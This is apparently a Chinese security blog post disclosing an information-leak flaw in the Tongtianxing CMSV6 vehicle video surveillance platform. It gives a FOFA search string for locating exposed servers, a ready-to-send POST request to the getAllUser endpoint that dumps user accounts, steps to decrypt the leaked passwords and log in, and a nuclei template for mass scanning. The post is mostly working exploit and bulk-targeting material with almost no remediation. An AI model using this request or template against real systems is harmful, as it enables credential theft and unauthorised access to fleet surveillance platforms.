通天星CMSV6 车载视频监控平台信息泄露漏洞

最新推荐文章于 2024-08-14 22:07:25 发布

网盾网络安全服务

最新推荐文章于 2024-08-14 22:07:25 发布

阅读量814

点赞数

文章标签：安全 web安全

本文链接：https://blog.csdn.net/qq_69775412/article/details/136728495

版权

漏洞描述

通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞

fofa语句

body="/808gps/"

漏洞复现

打开页面

构造payload

POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Content-Length: 9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

json=null

将拿到的密码进行解密

使用账号密码进行登录

nuclei批量验证

id: TongTianXin-CMS-Information-disclosure

info:
  name: 通天星CMSV6 车载视频监控平台 信息泄露漏
  author: changge
  severity: high
  description: |
    通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞。
  metadata:
    fofa-query: body="/808gps/"
  reference:
    - https://127.0.0.1
  tags: cms,tongtianxin,Information disclosure

http:
  - raw:
      - |
        POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        json=null


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "admin"